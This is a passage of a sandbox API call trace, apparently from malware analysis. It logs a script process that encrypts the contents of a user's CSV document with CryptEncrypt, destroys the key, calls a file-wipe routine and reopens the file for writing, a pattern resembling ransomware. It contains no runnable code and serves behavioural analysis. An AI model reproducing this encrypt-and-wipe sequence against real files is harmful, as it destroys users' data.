[0177.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0177.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.237] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0177.237] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2728, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2728*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0177.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0177.239] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0177.239] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0177.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0177.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0177.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0177.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0177.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0177.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0177.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.240] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.240] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.240] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.240] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.240] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.240] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.240] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0177.240] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.240] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.240] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0177.240] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.240] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.240] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0177.240] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.241] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.241] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.242] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xd24a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xd250) returned 1 [0177.242] CharLowerBuffW (in: lpsz="byte[53841]", cchLength=0xb | out: lpsz="byte[53841]") returned 0xb [0177.244] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.245] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.245] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa6c260*, pdwDataLen=0x87e820*=0xd24a, dwBufLen=0xd250 | out: pbData=0xa6c260*, pdwDataLen=0x87e820*=0xd250) returned 1 [0177.247] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.247] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.247] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.258] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0177.258] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.258] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.258] CryptDestroyKey (hKey=0x90af98) returned 1 [0177.258] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.259] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.259] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.259] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.259] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.259] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.259] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.259] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.259] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.259] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0177.259] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.259] FreeLibrary (hLibModule=0x74f20000) returned 1 [0177.264] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0177.264] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76dfe470, ftCreationTime.dwHighDateTime=0x1d5dae8, ftLastAccessTime.dwLowDateTime=0x7a81de0, ftLastAccessTime.dwHighDateTime=0x1d5db81, ftLastWriteTime.dwLowDateTime=0x7a81de0, ftLastWriteTime.dwHighDateTime=0x1d5db81, nFileSizeHigh=0x0, nFileSizeLow=0xd24a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="-V0 o3_nR9rc3_2DHH4.csv", cAlternateFileName="-V0O3_~1.CSV")) returned 0x90af58 [0177.265] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0177.265] CharLowerBuffW (in: lpsz="byte[53834]", cchLength=0xb | out: lpsz="byte[53834]") returned 0xb [0177.289] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0177.289] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0177.289] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0177.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0177.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0177.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0177.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2628 [0177.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2628, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0177.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0177.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0177.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0177.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0177.290] FreeLibrary (hLibModule=0x75c90000) returned 1 [0177.290] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0177.290] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0177.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0177.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0177.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0177.290] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0177.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0177.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9b9b50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0177.291] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\-v0 o3_nr9rc3_2dhh4.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0177.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0177.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0177.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0177.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0177.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0177.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0177.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0177.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0177.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0177.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0177.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0177.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0177.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd7260 | out: hHeap=0x8a0000) returned 1 [0177.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0177.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0177.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0177.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0177.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0177.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0177.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0177.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0177.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0177.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0177.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0177.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0177.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0177.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0177.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0177.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0177.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0177.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0177.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0177.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 